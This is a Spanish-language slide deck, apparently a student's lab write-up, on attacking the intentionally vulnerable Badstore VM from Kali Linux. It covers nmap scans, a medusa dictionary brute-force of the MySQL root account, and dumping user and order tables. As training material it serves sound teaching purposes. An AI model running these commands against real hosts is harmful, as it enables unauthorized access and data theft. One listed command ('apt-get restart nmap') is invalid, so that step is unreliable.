Está en la página 1de 13

Delfina Soledad Rojas Losada

*
*
*La inyeccin de SQL es una tcnica de
inyeccin de cdigo que explota una
vulnerabilidad de seguridad dentro de la capa
de base de datos de una aplicacin. Esta
vulnerabilidad puede encontrarse cuando la
entrada del usuario se filtra de forma
incorrecta debido a caracteres de escape
embebidos en sentencias SQL.

*
*Se inician las maquinas virtuales (Kali Linux y
Badstore) y se consulta la ip de la maquina
vulnerable.

*
*Instalar nmap: sudo apt-get install nmap
*En nuestro caso estamos utilizando kali Linux,
entonces nmap ya viene instalado por defecto,
nicamente se restaura con el comando
*sudo apt-get restart nmap
*se inicia el escaneo a la maquina vulnerable,
en este caso badstore: nmap 192.168.1.14

*
* nmap T4 -A v 192.168.1.14











* Version de Mysql: 1.7. estndar
* Version de apache: HTTPD 1.3.28


*Con el comando: medusa -h 192.168.1.14 -u
root -P ./tools/diccionarios/phpbb.txt -e ns -M
mysql


*
*badstore: badstoredb: mysql u root h
192.168.1.14
*
*Show databases;
*
*Show tables;
*
*Select* from userdb;
*select* from orderdb;
*select* from itembd;
*select* from acctbd;

*
*Las contraseas estn encriptadas, no podemos
acceder a la informacin, por ello se crea un
nuevo usuario.
*
*Select* from userdb;
*
*PORTAL HACKER:
* http://www.portalhacker.net/b37/propuesta-
atacar-badstore-entre-todos-
documentarlo/127736/
*